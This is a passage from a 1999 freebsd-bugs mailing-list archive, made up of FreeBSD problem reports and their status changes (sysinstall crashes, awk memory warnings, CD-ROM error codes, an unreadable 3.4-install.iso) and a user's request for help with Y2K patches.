sheldonh Responsible-Changed-When: Tue Dec 21 06:26:41 PST 1999 Responsible-Changed-Why: Jordan knows about this one. :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 6:38:36 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1DAB814F26; Tue, 21 Dec 1999 06:38:35 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA89913; Tue, 21 Dec 1999 06:38:35 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Tue, 21 Dec 1999 06:38:35 -0800 (PST) From: Message-Id: <199912211438.GAA89913@freefall.freebsd.org> To: sheldonh@FreeBSD.org, jraynard@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/1375: Extraneous warning from mv(1) [PATCH] Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Extraneous warning from mv(1) [PATCH] Responsible-Changed-From-To: jraynard->freebsd-bugs Responsible-Changed-By: sheldonh Responsible-Changed-When: Tue Dec 21 06:37:05 PST 1999 Responsible-Changed-Why: James has retired from active service. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 6:52: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A6BCC14E94; Tue, 21 Dec 1999 06:52:06 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA17931; Tue, 21 Dec 1999 06:52:06 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Tue, 21 Dec 1999 06:52:06 -0800 (PST) From: Message-Id: <199912211452.GAA17931@freefall.freebsd.org> To: murduth@ludd.luth.se, sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/9281: awk asumes memory that is returned from malloc is clean. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: awk asumes memory that is returned from malloc is clean. State-Changed-From-To: open->closed State-Changed-By: sheldonh State-Changed-When: Tue Dec 21 06:50:56 PST 1999 State-Changed-Why: Our gawk was upgraded to 3.0.4 in CURRENT a while ago and merged in time for 3.4-RELEASE. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 6:54:45 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6630315458; Tue, 21 Dec 1999 06:54:42 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA18411; Tue, 21 Dec 1999 06:54:42 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Tue, 21 Dec 1999 06:54:42 -0800 (PST) From: Message-Id: <199912211454.GAA18411@freefall.freebsd.org> To: archer@lucky.net, sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: gnu/7821: awk in free(): warning: chunk is already free. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: awk in free(): warning: chunk is already free. State-Changed-From-To: suspended->closed State-Changed-By: sheldonh State-Changed-When: Tue Dec 21 06:54:07 PST 1999 State-Changed-Why: Our gawk was upgraded to 3.0.4 in CURRENT a while ago and merged in time for 3.4-RELEASE. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 7:19:13 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from wall.polstra.com (rtrwan160.accessone.com [206.213.115.74]) by hub.freebsd.org (Postfix) with ESMTP id 7823015022; Tue, 21 Dec 1999 07:19:11 -0800 (PST) (envelope-from jdp@polstra.com) Received: from vashon.polstra.com (vashon.polstra.com [206.213.73.13]) by wall.polstra.com (8.9.3/8.9.3) with ESMTP id HAA13582; Tue, 21 Dec 1999 07:19:08 -0800 (PST) (envelope-from jdp@polstra.com) Received: (from jdp@localhost) by vashon.polstra.com (8.9.3/8.9.1) id HAA41923; Tue, 21 Dec 1999 07:19:07 -0800 (PST) (envelope-from jdp@polstra.com) Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: Date: Tue, 21 Dec 1999 07:19:07 -0800 (PST) Organization: Polstra & Co., Inc. From: John Polstra To: "Chris D. Faulhaber" Subject: Re: misc/15521 - FreeBSD Anonymous CVS server is back in operati Cc: jhb@freebsd.org, bugs@freebsd.org, Daniel Hagan Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Chris D. Faulhaber wrote: > On Tue, 21 Dec 1999, Daniel Hagan wrote: > >> The PR I filed should probably be updated to a doc bug now that anoncvs is >> fixed. The handbook article should be updated to reflect the new >> instructions. >> > > The handbook was updated yesterday to reflect this and should be on the > website today: Yep, in fact I waited to announce the new server until I saw that the updates had propagated to the web site. :-) I see that you've closed the PR -- thanks. John To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 7:30: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CF24814F5D for ; Tue, 21 Dec 1999 07:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA21785; Tue, 21 Dec 1999 07:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 129A814F8E; Tue, 21 Dec 1999 07:27:47 -0800 (PST) Message-Id: <19991221152747.129A814F8E@hub.freebsd.org> Date: Tue, 21 Dec 1999 07:27:47 -0800 (PST) From: abamrah@home.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: i386/15607: SYSINSTALL gives core dump. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15607 >Category: i386 >Synopsis: SYSINSTALL gives core dump. >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Dec 21 07:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Amrit Pal Singh Bamrah >Release: 3.4-RELEASE >Organization: Penheaven Writing Instruments >Environment: >Description: I had installed FreeBSD 3.3-RELEASE on my Pentium 100 Mhz machine which was working fine until I received this mail about 3.4-RELEASE. I went home, download KERN.FLP and MFSROOT.FLP images, and created the boot floppies to boot the new kernel and use new SYSINSTALL. Floppies booted fine and I was able to upgrade my system with X-user option. I used FTP mode to upgrade. After the upgrade was successfully completed , I rebooted my machine and wanted to select some distributions. When I selected Configure, Distributions, the system CORE DUMPED on me. Also in SYSINSTALL, there is no C option in front of Custom line. Regards. Amrit >How-To-Repeat: Install 3.3-RELEASE on a Pentium machine and upgrade using two floppies as above and use ftp to upgrade. Upgrade it and reboot. Enter /stand/sysinstall at the command prompt. Select Configure, Distributions and yyou will get a core dump. >Fix: Nothing for now. Currently working on. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 7:36:52 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2B83614E67; Tue, 21 Dec 1999 07:36:51 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA22284; Tue, 21 Dec 1999 07:36:51 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Tue, 21 Dec 1999 07:36:51 -0800 (PST) From: Message-Id: <199912211536.HAA22284@freefall.freebsd.org> To: abamrah@home.com, sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/15607: SYSINSTALL gives core dump. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: SYSINSTALL gives core dump. State-Changed-From-To: open->closed State-Changed-By: sheldonh State-Changed-When: Tue Dec 21 07:36:21 PST 1999 State-Changed-Why: Duplicate of PR 15606. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 7:48:37 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from cowpie.acm.vt.edu (cowpie.acm.vt.edu [128.173.42.253]) by hub.freebsd.org (Postfix) with ESMTP id 916FC14CF4 for ; Tue, 21 Dec 1999 07:48:32 -0800 (PST) (envelope-from dhagan@cowpie.acm.vt.edu) Received: (from dhagan@localhost) by cowpie.acm.vt.edu (8.9.3/8.9.3) id KAA16508 for bugs@freebsd.org; Tue, 21 Dec 1999 10:47:25 -0500 (EST) Date: Tue, 21 Dec 1999 10:47:24 -0500 (EST) From: Daniel Hagan To: bugs@freebsd.org Subject: Re: FreeBSD 3.4-RELEASE is now available In-Reply-To: <199912201845.KAA01421@zippy.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 20 Dec 1999, Jordan K. Hubbard wrote: > ftp://ftp.FreeBSD.org/pub/FreeBSD/releases/i386/ISO-IMAGES/3.4-install.cd0 It appears to be named 3.4-install.iso instead of 3.4-install.cd0; and it also appears to be mode 0600... ftp> pwd 257 "/.2/FreeBSD/releases/i386/ISO-IMAGES" is current directory. ftp> ls -l 200 PORT command successful. 150 Opening ASCII mode data connection for 'file list'. total 1291705 -rw-r--r-- 1 2035 207 675028992 Oct 1 03:30 3.3-install.cd0 lrwxr-xr-x 1 2035 207 15 Oct 16 03:14 3.3-install.iso -> 3.3-install.cd0 -rw------- 1 2035 207 647673856 Dec 20 13:43 3.4-install.iso -rw-r--r-- 1 2035 207 174 Dec 20 18:39 CHECKSUM.MD5 -rw-r--r-- 1 2035 207 1018 Oct 17 19:47 README.TXT 226 Transfer complete. ftp> -- Daniel Hagan http://www.acm.vt.edu/~dhagan/ Head Admin dhagan@acm.vt.edu PGP 2.6.2 encouraged ACM at VT "The world is coming to an end. Please log off." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 7:50: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 63C9115439 for ; Tue, 21 Dec 1999 07:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA23455; Tue, 21 Dec 1999 07:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from quack.kfu.com (quack.kfu.com [170.1.70.2]) by hub.freebsd.org (Postfix) with ESMTP id 46A67150FD for ; Tue, 21 Dec 1999 07:45:39 -0800 (PST) (envelope-from nsayer@mailhost.kfu.com) Received: from morpheus.kfu.com (morpheus.kfu.com [170.1.70.19]) by quack.kfu.com (8.9.2/8.9.3) with ESMTP id HAA63223 for ; Tue, 21 Dec 1999 07:45:38 -0800 (PST) (envelope-from nsayer@mailhost.kfu.com) Received: by morpheus.kfu.com (8.9.3//ident-1.0) id HAA00571; Tue, 21 Dec 1999 07:45:38 -0800 (PST) Message-Id: <199912211545.HAA00571@morpheus.kfu.com> Date: Tue, 21 Dec 1999 07:45:38 -0800 (PST) From: nsayer@quack.kfu.com Reply-To: nsayer@quack.kfu.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/15608: acd0 / cd0 give inconsistent errors on empty tray open() Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15608 >Category: kern >Synopsis: acd0 / cd0 give inconsistent errors on empty tray open() >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Dec 21 07:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Nick Sayer >Release: FreeBSD 4.0-CURRENT i386 >Organization: Just me >Environment: SCSI and EIDE CDROM drives, no disk in tray. >Description: Opening an EIDE CDROM with no disk in the tray yields EIO. Doing the same on a SCSI cdrom yields ENODEV. Returning ENXIO instead of EIO breaks vmware and seems to me, at least, to be the wrong error. There _is_ a device there. >How-To-Repeat: >Fix: IMHO, the two devices should be consistent, and EIO, at least, doesn't break vmware. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 8: 5:37 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 89EEF151FC; Tue, 21 Dec 1999 08:05:36 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA24891; Tue, 21 Dec 1999 08:05:36 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Tue, 21 Dec 1999 08:05:36 -0800 (PST) From: Message-Id: <199912211605.IAA24891@freefall.freebsd.org> To: jher@io.com, sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/6858: inetd in realloc(): warning: junk pointer, too low to make sense. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: inetd in realloc(): warning: junk pointer, too low to make sense. State-Changed-From-To: suspended->feedback State-Changed-By: sheldonh State-Changed-When: Tue Dec 21 08:04:00 PST 1999 State-Changed-Why: Fixes which went into CURRENT for the inetd problem have been merged into 3.3-STABLE and have made it into 3.4-RELEASE. Could you try with the newer sources and let me know? I'd like to try to keep one problem per PR, so if we can confirm that the junk pointer bug in inetd is really fixed (and I believe it is), I'll want to close this PR. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 8:31: 1 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 407B61544F; Tue, 21 Dec 1999 08:31:00 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA27899; Tue, 21 Dec 1999 08:31:00 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Tue, 21 Dec 1999 08:31:00 -0800 (PST) From: Message-Id: <199912211631.IAA27899@freefall.freebsd.org> To: init@eudaemonia.net, phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: conf/9845: Propose adding options to rc.conf and rc.network Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Propose adding options to rc.conf and rc.network State-Changed-From-To: open->closed State-Changed-By: phantom State-Changed-When: Tue Dec 21 08:30:33 PST 1999 State-Changed-Why: Fixed by imp at 1999/03/28 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 8:31:47 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from hopper.isi.com (hopper.isi.com [192.73.222.1]) by hub.freebsd.org (Postfix) with ESMTP id 9627B14F23 for ; Tue, 21 Dec 1999 08:31:45 -0800 (PST) (envelope-from FSafi@isi.com) Received: from karma.isi.com (pixsv176.isi.com [192.73.222.126]) by hopper.isi.com (8.8.4/8.6.10) with ESMTP id IAA13409 for ; Tue, 21 Dec 1999 08:31:45 -0800 (PST) Received: from y2kpc10 (y2kpc10 [192.216.227.64]) by karma.isi.com (Pro-8.9.3/Pro-8.9.3/Mailout 991117 TroyC) with SMTP id IAA16918 for ; Tue, 21 Dec 1999 08:27:30 -0800 (PST) Reply-To: From: "Farhat Safi" To: Subject: Help Date: Tue, 21 Dec 1999 08:31:58 -0800 Message-ID: <006b01bf4bd0$e69a35d0$40e3d8c0@isi.com> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_006C_01BF4B8D.D876F5D0" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 X-MS-TNEF-Correlator: 00000000392FCEC9A667D311B0370050049D6B7AC4CC2000 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_006C_01BF4B8D.D876F5D0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Hello, I have a freeBSD version 2.2.1 and need to make it Y2K compliant. I have visited the website and found out that there are some patches available for it. But what I need help with is on how to download these patches and apply them. Can you please help me, may be some instructions or anything will help. Best Regards ------=_NextPart_000_006C_01BF4B8D.D876F5D0 Content-Type: application/ms-tnef; name="winmail.dat" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="winmail.dat" eJ8+IjoQAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcAGAAAAElQTS5NaWNy b3NvZnQgTWFpbC5Ob3RlADEIAQ2ABAACAAAAAgACAAEIAAUABAAAAAAAAAAAAAEJAAQAAgAAAAAA AAABBoADAA4AAADPBwwAFQAIAB8AAAACACABAQOQBgBIBgAAKwAAAAsAAgABAAAACwAjAAAAAAAD ACYAAAAAAAsAKQAAAAAACwArAAAAAAADAC4AAAAAAAMANgAAAAAAHgBNAAEAAAABAAAAAAAAAB4A cAABAAAABQAAAEhlbHAAAAAAAgFxAAEAAAAbAAAAAb9LOQ2Q8Zia/rGMEdOwewBQBJ1regAl80Ig AAsAFwwAAAAAAgEdDAEAAAATAAAAU01UUDpGU0FGSUBJU0kuQ09NAAALAAEOAAAAAEAABg4A+s3D 0Eu/AQIBCg4BAAAAGAAAAAAAAAA5L87JpmfTEbA3AFAEnWt6woAAAAsAHw4BAAAAAwAGEBdWWCkD AAcQAAEAAB4ACBABAAAAZQAAAEhFTExPLElIQVZFQUZSRUVCU0RWRVJTSU9OMjIxQU5ETkVFRFRP TUFLRUlUWTJLQ09NUExJQU5USUhBVkVWSVNJVEVEVEhFV0VCU0lURUFOREZPVU5ET1VUVEhBVFRI RVJFQVIAAAAAAgEJEAEAAACjAQAAnwEAABYCAABMWkZ1+7qPtQMACgByY3BnMTI1FjIA+Atgbg4Q MDMzTwH3AqQD4wIAY2gKwHOwZXQwIAcTAoB9CoDZCMggOwlvDjA1AoAKgZJ2CJB3awuAZDQMYPZj AFALA2MAQQu2CrEKhG8KgRWQFjEDYHQFkAVASJRlbAkALBZKSSAQ8GB2ZSBhIANQCeBCWFNEIBkw ERBpAiAgNDIuGoAxGVAUwCBuowngGwB0byAAwGsZQEJpBUBZMksgBaBt5wtQBzACMC4gGPUUYACQ ixeAG1FoGUB3ZWIdonsa0wIQdRrxCGAFQB4AYe8fggSQGUEgIXMDcBlACrD+dBDgB5EZIAtwC2AC YBlArwIQBcAb8BzwQh9xdx+yZxjwGyMeEGxwHjAb8GhnG+AEIBpRaG8H4BtxZPUkkG4JAGEd4xEg INga8VRhcAtQeR3ybRzwQ90DkXkIYCDQIdBhJbEjg20HgCwbkSbgYiB1C4Bz9HRyFQB0GkEkMQXA AHB2eR4AC4BnI8EX8CNzLhsWSxZTQgeQBUBSZWcvCxEQsBZTEeEALlAAAwAQEAAAAAADABEQAAAA AAsAAYAIIAYAAAAAAMAAAAAAAABGAAAAAAOFAAAAAAAAAwADgAggBgAAAAAAwAAAAAAAAEYAAAAA EIUAAAAAAAADAAeACCAGAAAAAADAAAAAAAAARgAAAABShQAA8BMAAB4ACIAIIAYAAAAAAMAAAAAA AABGAAAAAFSFAAABAAAABAAAADguNQALAAyACCAGAAAAAADAAAAAAAAARgAAAAAGhQAAAAAAAAMA DYAIIAYAAAAAAMAAAAAAAABGAAAAAAGFAAAAAAAACwAWgAggBgAAAAAAwAAAAAAAAEYAAAAADoUA AAAAAAADABeACCAGAAAAAADAAAAAAAAARgAAAAARhQAAAAAAAAMAGYAIIAYAAAAAAMAAAAAAAABG AAAAABiFAAAAAAAAHgAogAggBgAAAAAAwAAAAAAAAEYAAAAANoUAAAEAAAABAAAAAAAAAB4AKYAI IAYAAAAAAMAAAAAAAABGAAAAADeFAAABAAAAAQAAAAAAAAAeACqACCAGAAAAAADAAAAAAAAARgAA AAA4hQAAAQAAAAEAAAAAAAAACwAygAggBgAAAAAAwAAAAAAAAEYAAAAAgoUAAAEAAAALADSACyAG AAAAAADAAAAAAAAARgAAAAAAiAAAAAAAAAsANoALIAYAAAAAAMAAAAAAAABGAAAAAAWIAAAAAAAA AgH4DwEAAAAQAAAAOS/OyaZn0xGwNwBQBJ1regIB+g8BAAAAEAAAADkvzsmmZ9MRsDcAUASda3oC AfsPAQAAAIAAAAAAAAAAOKG7EAXlEBqhuwgAKypWwgAAUFNUUFJYLkRMTAAAAAAAAAAATklUQfm/ uAEAqgA32W4AAABDOlxXSU5OVFxQcm9maWxlc1xmc2FmaVxBcHBsaWNhdGlvbiBEYXRhXE1pY3Jv c29mdFxPdXRsb29rXG91dGxvb2sucHN0AAMA/g8FAAAAAwANNP03AAACAX8AAQAAADEAAAAwMDAw MDAwMDM5MkZDRUM5QTY2N0QzMTFCMDM3MDA1MDA0OUQ2QjdBQzRDQzIwMDAAAAAAMTE= ------=_NextPart_000_006C_01BF4B8D.D876F5D0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 8:32: 1 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5DBCB1547A; Tue, 21 Dec 1999 08:32:00 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA28085; Tue, 21 Dec 1999 08:32:00 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Tue, 21 Dec 1999 08:32:00 -0800 (PST) From: Message-Id: <199912211632.IAA28085@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, jkh@FreeBSD.org Subject: Re: conf/10244: 100 character limit on any pathname in sysinstall Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: 100 character limit on any pathname in sysinstall Responsible-Changed-From-To: freebsd-bugs->jkh Responsible-Changed-By: phantom Responsible-Changed-When: Tue Dec 21 08:31:30 PST 1999 Responsible-Changed-Why: Over to sysinstall owner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 8:34:46 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 919C4154BB; Tue, 21 Dec 1999 08:34:37 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA28352; Tue, 21 Dec 1999 08:34:37 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Tue, 21 Dec 1999 08:34:37 -0800 (PST) From: Message-Id: <199912211634.IAA28352@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, jkh@FreeBSD.org Subject: Re: conf/11905: sysinstall desktop changing inconvenience Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: sysinstall desktop changing inconvenience Responsible-Changed-From-To: freebsd-bugs->jkh Responsible-Changed-By: phantom Responsible-Changed-When: Tue Dec 21 08:33:57 PST 1999 Responsible-Changed-Why: Over to sysinstall owner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 9: 0:27 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 421A114C28; Tue, 21 Dec 1999 09:00:26 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA30974; Tue, 21 Dec 1999 09:00:26 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Tue, 21 Dec 1999 09:00:26 -0800 (PST) From: Message-Id: <199912211700.JAA30974@freefall.freebsd.org> To: brooks@one-eyed-alien.net, phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: conf/12026: /etc/rc.diskless1 refrences non-existant /usr/share/examples/diskless Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: /etc/rc.diskless1 refrences non-existant /usr/share/examples/diskless State-Changed-From-To: open->closed State-Changed-By: phantom State-Changed-When: Tue Dec 21 08:59:50 PST 1999 State-Changed-Why: diskless examples MFCed to -STABLE. Thanks for notification! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 9: 1:55 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C967814EE0; Tue, 21 Dec 1999 09:01:54 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA31155; Tue, 21 Dec 1999 09:01:54 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Tue, 21 Dec 1999 09:01:54 -0800 (PST) From: Message-Id: <199912211701.JAA31155@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, jkh@FreeBSD.org Subject: Re: conf/13249: sysinstall not installing from a local ftp site Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: sysinstall not installing from a local ftp site Responsible-Changed-From-To: freebsd-bugs->jkh Responsible-Changed-By: phantom Responsible-Changed-When: Tue Dec 21 09:01:32 PST 1999 Responsible-Changed-Why: Over to maintainer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Dec 21 9:20: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D2DDB15458 for ; Tue, 21 Dec 1999 09:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA32780; Tue, 21 Dec 1999 09:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from aaz.links.ru (aaz.links.ru [193.125.152.37]) by hub.freebsd.org (Postfix) with ESMTP id 004D714F85 for ; Tue, 21 Dec 1999 09:16:13 -0800 (PST) (envelope-from babolo@links.ru) Received: (from babolo@localhost) by aaz.links.ru (8.9.3/8.9.3) id UAA24560; Tue, 21 Dec 1999 20:19:13 +0300 (MSK) Message-Id: <199912211719.UAA24560@aaz.links.ru> Date: Tue, 21 Dec 1999 20:19:13 +0300 (MSK) From: babolo@links.ru Reply-To: babolo@links.ru To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: misc/15609: 3.4-install.iso unreadable Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15609 >Category: misc >Synopsis: 3.4-install.iso unreadable >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Dec 21 09:20:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Aleksandr A. Babaylov >Release: FreeBSD 3.4-RELEASE i386 >Organization: >Environment: >Description: $ ls ftp://ftp.FreeBSD.org/pub/FreeBSD/releases/i386/ISO-IMAGES/3.4-install.iso -rw------- 1 2035 207 647673856 Dec 20 13:43 3.4-install.iso $ fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/releases/i386/ISO-IMAGES/3.4-install.iso fetch: 